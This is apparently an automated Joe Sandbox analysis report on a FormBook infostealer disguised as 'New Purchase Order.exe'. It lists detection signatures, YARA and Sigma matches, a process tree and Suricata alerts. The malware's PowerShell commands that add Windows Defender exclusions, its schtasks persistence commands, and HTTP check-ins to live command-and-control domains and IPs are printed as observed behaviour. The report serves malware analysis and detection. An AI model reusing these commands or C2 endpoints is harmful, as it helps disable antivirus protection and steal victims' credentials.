Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
New Purchase Order.exe

Overview

General Information

Sample name:New Purchase Order.exe
Analysis ID:1512971
MD5:e392c45451247441d1763095db3cd57a
SHA1:f37255d99c5bff5c1e60209d7afee3445e277e6d
SHA256:7616904db54d77cb25cc58f279bfdf6ef5cbabe19573cbd781238be01daaa1c4
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • New Purchase Order.exe (PID: 4988 cmdline: "C:\Users\user\Desktop\New Purchase Order.exe" MD5: E392C45451247441D1763095DB3CD57A)
    • powershell.exe (PID: 1664 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New Purchase Order.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 2996 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hbaiQWstL.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 2328 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 5368 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hbaiQWstL" /XML "C:\Users\user\AppData\Local\Temp\tmpBCD4.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 6516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • New Purchase Order.exe (PID: 6108 cmdline: "C:\Users\user\Desktop\New Purchase Order.exe" MD5: E392C45451247441D1763095DB3CD57A)
      • SguBfrlSDIFxPr.exe (PID: 4136 cmdline: "C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • setupugc.exe (PID: 3416 cmdline: "C:\Windows\SysWOW64\setupugc.exe" MD5: 342CBB77B3F4B3F073DF2F042D20E121)
          • SguBfrlSDIFxPr.exe (PID: 3196 cmdline: "C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 1584 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • hbaiQWstL.exe (PID: 2308 cmdline: C:\Users\user\AppData\Roaming\hbaiQWstL.exe MD5: E392C45451247441D1763095DB3CD57A)
    • schtasks.exe (PID: 4188 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hbaiQWstL" /XML "C:\Users\user\AppData\Local\Temp\tmpD3A8.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 1220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • hbaiQWstL.exe (PID: 2748 cmdline: "C:\Users\user\AppData\Roaming\hbaiQWstL.exe" MD5: E392C45451247441D1763095DB3CD57A)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000009.00000002.2390888509.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000009.00000002.2390888509.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2f2a3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x17412:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000011.00000002.3378481674.0000000003350000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000011.00000002.3378481674.0000000003350000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2bfe0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x1414f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000009.00000002.2391347243.00000000012D0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 13 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        9.2.New Purchase Order.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          9.2.New Purchase Order.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2e4a3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x16612:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          9.2.New Purchase Order.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            9.2.New Purchase Order.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2f2a3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x17412:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New Purchase Order.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New Purchase Order.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\New Purchase Order.exe", ParentImage: C:\Users\user\Desktop\New Purchase Order.exe, ParentProcessId: 4988, ParentProcessName: New Purchase Order.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New Purchase Order.exe", ProcessId: 1664, ProcessName: powershell.exe
            Sigma detected: Powershell Defender Exclusion
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New Purchase Order.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New Purchase Order.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\New Purchase Order.exe", ParentImage: C:\Users\user\Desktop\New Purchase Order.exe, ParentProcessId: 4988, ParentProcessName: New Purchase Order.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New Purchase Order.exe", ProcessId: 1664, ProcessName: powershell.exe
            Sigma detected: Suspicious Add Scheduled Task Parent
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hbaiQWstL" /XML "C:\Users\user\AppData\Local\Temp\tmpD3A8.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hbaiQWstL" /XML "C:\Users\user\AppData\Local\Temp\tmpD3A8.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\hbaiQWstL.exe, ParentImage: C:\Users\user\AppData\Roaming\hbaiQWstL.exe, ParentProcessId: 2308, ParentProcessName: hbaiQWstL.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hbaiQWstL" /XML "C:\Users\user\AppData\Local\Temp\tmpD3A8.tmp", ProcessId: 4188, ProcessName: schtasks.exe
            Sigma detected: Suspicious Schtasks From Env Var Folder
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hbaiQWstL" /XML "C:\Users\user\AppData\Local\Temp\tmpBCD4.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hbaiQWstL" /XML "C:\Users\user\AppData\Local\Temp\tmpBCD4.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\New Purchase Order.exe", ParentImage: C:\Users\user\Desktop\New Purchase Order.exe, ParentProcessId: 4988, ParentProcessName: New Purchase Order.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hbaiQWstL" /XML "C:\Users\user\AppData\Local\Temp\tmpBCD4.tmp", ProcessId: 5368, ProcessName: schtasks.exe
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New Purchase Order.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New Purchase Order.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\New Purchase Order.exe", ParentImage: C:\Users\user\Desktop\New Purchase Order.exe, ParentProcessId: 4988, ParentProcessName: New Purchase Order.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New Purchase Order.exe", ProcessId: 1664, ProcessName: powershell.exe

            Persistence and Installation Behavior

            barindex
            Sigma detected: Scheduled temp file as task from temp location
            Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hbaiQWstL" /XML "C:\Users\user\AppData\Local\Temp\tmpBCD4.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hbaiQWstL" /XML "C:\Users\user\AppData\Local\Temp\tmpBCD4.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\New Purchase Order.exe", ParentImage: C:\Users\user\Desktop\New Purchase Order.exe, ParentProcessId: 4988, ParentProcessName: New Purchase Order.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hbaiQWstL" /XML "C:\Users\user\AppData\Local\Temp\tmpBCD4.tmp", ProcessId: 5368, ProcessName: schtasks.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-18T09:02:38.896122+020028554651A Network Trojan was detected192.168.2.64972382.221.128.18380TCP
            2024-09-18T09:03:10.463337+020028554651A Network Trojan was detected192.168.2.657954217.160.0.12780TCP
            2024-09-18T09:03:24.018954+020028554651A Network Trojan was detected192.168.2.65796085.159.66.9380TCP
            2024-09-18T09:03:38.098354+020028554651A Network Trojan was detected192.168.2.65796413.228.81.3980TCP
            2024-09-18T09:03:51.953976+020028554651A Network Trojan was detected192.168.2.657969162.0.213.9480TCP
            2024-09-18T09:04:05.882314+020028554651A Network Trojan was detected192.168.2.6579733.33.130.19080TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-18T09:03:02.686621+020028554641A Network Trojan was detected192.168.2.657951217.160.0.12780TCP
            2024-09-18T09:03:05.348998+020028554641A Network Trojan was detected192.168.2.657952217.160.0.12780TCP
            2024-09-18T09:03:07.911277+020028554641A Network Trojan was detected192.168.2.657953217.160.0.12780TCP
            2024-09-18T09:03:17.180314+020028554641A Network Trojan was detected192.168.2.65795785.159.66.9380TCP
            2024-09-18T09:03:19.727259+020028554641A Network Trojan was detected192.168.2.65795885.159.66.9380TCP
            2024-09-18T09:03:22.274064+020028554641A Network Trojan was detected192.168.2.65795985.159.66.9380TCP
            2024-09-18T09:03:30.443957+020028554641A Network Trojan was detected192.168.2.65796113.228.81.3980TCP
            2024-09-18T09:03:33.005262+020028554641A Network Trojan was detected192.168.2.65796213.228.81.3980TCP
            2024-09-18T09:03:35.518266+020028554641A Network Trojan was detected192.168.2.65796313.228.81.3980TCP
            2024-09-18T09:03:44.286470+020028554641A Network Trojan was detected192.168.2.657965162.0.213.9480TCP
            2024-09-18T09:03:46.872970+020028554641A Network Trojan was detected192.168.2.657966162.0.213.9480TCP
            2024-09-18T09:03:49.478868+020028554641A Network Trojan was detected192.168.2.657967162.0.213.9480TCP
            2024-09-18T09:03:57.763893+020028554641A Network Trojan was detected192.168.2.6579703.33.130.19080TCP
            2024-09-18T09:04:00.089121+020028554641A Network Trojan was detected192.168.2.6579713.33.130.19080TCP
            2024-09-18T09:04:03.651445+020028554641A Network Trojan was detected192.168.2.6579723.33.130.19080TCP
            2024-09-18T09:04:11.391462+020028554641A Network Trojan was detected192.168.2.65797413.248.169.4880TCP
            2024-09-18T09:04:13.917505+020028554641A Network Trojan was detected192.168.2.65797513.248.169.4880TCP
            2024-09-18T09:04:16.464696+020028554641A Network Trojan was detected192.168.2.65797613.248.169.4880TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: New Purchase Order.exeAvira: detected
            Antivirus detection for dropped file
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeAvira: detection malicious, Label: HEUR/AGEN.1306097
            Multi AV Scanner detection for dropped file
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeReversingLabs: Detection: 28%
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeVirustotal: Detection: 32%Perma Link
            Multi AV Scanner detection for submitted file
            Source: New Purchase Order.exeVirustotal: Detection: 32%Perma Link
            Source: New Purchase Order.exeReversingLabs: Detection: 18%
            Yara detected FormBook
            Source: Yara matchFile source: 9.2.New Purchase Order.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.New Purchase Order.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000009.00000002.2390888509.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.3378481674.0000000003350000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.2391347243.00000000012D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.3376676008.0000000003140000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.3376249726.0000000000CE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.3381064714.0000000004D60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.3379021381.0000000002F50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.2393013278.00000000024F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for dropped file
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeJoe Sandbox ML: detected
            Machine Learning detection for sample
            Source: New Purchase Order.exeJoe Sandbox ML: detected
            Source: New Purchase Order.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: New Purchase Order.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: setupugc.pdb source: New Purchase Order.exe, 00000009.00000002.2391524148.0000000001348000.00000004.00000020.00020000.00000000.sdmp, SguBfrlSDIFxPr.exe, 00000010.00000003.2330358622.000000000084B000.00000004.00000020.00020000.00000000.sdmp, SguBfrlSDIFxPr.exe, 00000010.00000002.3377112326.0000000000867000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: SguBfrlSDIFxPr.exe, 00000010.00000000.2305918162.000000000093E000.00000002.00000001.01000000.0000000D.sdmp, SguBfrlSDIFxPr.exe, 00000014.00000000.2457069327.000000000093E000.00000002.00000001.01000000.0000000D.sdmp
            Source: Binary string: wntdll.pdbUGP source: New Purchase Order.exe, 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, setupugc.exe, 00000011.00000002.3378895822.0000000003630000.00000040.00001000.00020000.00000000.sdmp, setupugc.exe, 00000011.00000003.2391133969.000000000329A000.00000004.00000020.00020000.00000000.sdmp, setupugc.exe, 00000011.00000003.2393257406.0000000003486000.00000004.00000020.00020000.00000000.sdmp, setupugc.exe, 00000011.00000002.3378895822.00000000037CE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: New Purchase Order.exe, New Purchase Order.exe, 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, setupugc.exe, setupugc.exe, 00000011.00000002.3378895822.0000000003630000.00000040.00001000.00020000.00000000.sdmp, setupugc.exe, 00000011.00000003.2391133969.000000000329A000.00000004.00000020.00020000.00000000.sdmp, setupugc.exe, 00000011.00000003.2393257406.0000000003486000.00000004.00000020.00020000.00000000.sdmp, setupugc.exe, 00000011.00000002.3378895822.00000000037CE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: setupugc.pdbGCTL source: New Purchase Order.exe, 00000009.00000002.2391524148.0000000001348000.00000004.00000020.00020000.00000000.sdmp, SguBfrlSDIFxPr.exe, 00000010.00000003.2330358622.000000000084B000.00000004.00000020.00020000.00000000.sdmp, SguBfrlSDIFxPr.exe, 00000010.00000002.3377112326.0000000000867000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_00CFC520 FindFirstFileW,FindNextFileW,FindClose,17_2_00CFC520
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 4x nop then jmp 074D020Bh0_2_074D038F
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]10_2_058EC518
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 4x nop then xor eax, eax17_2_00CE9C00
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 4x nop then mov ebx, 00000004h17_2_03480469

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:57964 -> 13.228.81.39:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:57965 -> 162.0.213.94:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:57961 -> 13.228.81.39:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49723 -> 82.221.128.183:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:57973 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:57967 -> 162.0.213.94:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:57963 -> 13.228.81.39:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:57962 -> 13.228.81.39:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:57951 -> 217.160.0.127:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:57969 -> 162.0.213.94:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:57953 -> 217.160.0.127:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:57975 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:57972 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:57960 -> 85.159.66.93:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:57970 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:57976 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:57958 -> 85.159.66.93:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:57952 -> 217.160.0.127:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:57959 -> 85.159.66.93:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:57957 -> 85.159.66.93:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:57966 -> 162.0.213.94:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:57974 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:57954 -> 217.160.0.127:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:57971 -> 3.33.130.190:80
            Performs DNS queries to domains with low reputation
            Source: DNS query: www.nevsehir-nakliyat.xyz
            Source: Joe Sandbox ViewIP Address: 162.0.213.94 162.0.213.94
            Source: Joe Sandbox ViewIP Address: 217.160.0.127 217.160.0.127
            Source: Joe Sandbox ViewASN Name: ACPCA ACPCA
            Source: Joe Sandbox ViewASN Name: THORDC-ASIS THORDC-ASIS
            Source: Joe Sandbox ViewASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE
            Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /ujbu/?O4s0=7rrhM&np=MTTknThtRCJj0ATwznqj01o1Cri3+JPfOmsto+GOgM7INhQU0fKKD5oUBTZzolSVFZTYJ8HdpMRBL7zARboLk94tH9MdVpcC/d4hhj8l3F2/cR0CQHBzLt4ZWoJ62kMu+v5Sa8M= HTTP/1.1Host: www.nosr.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
            Source: global trafficHTTP traffic detected: GET /4c7j/?O4s0=7rrhM&np=hrEH6McWLCF5pgA68gNL2x/WHVd3zz4Lu443cuDXEGm/YRJcjH1mUpiczm8APdsMFHQVN63ktGuGy3xZxkW74id0uvrTjdsIz/rLBcjWUYSu3cGevEH/eSJ/+YdconAbopgpETc= HTTP/1.1Host: www.complexity.pubAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
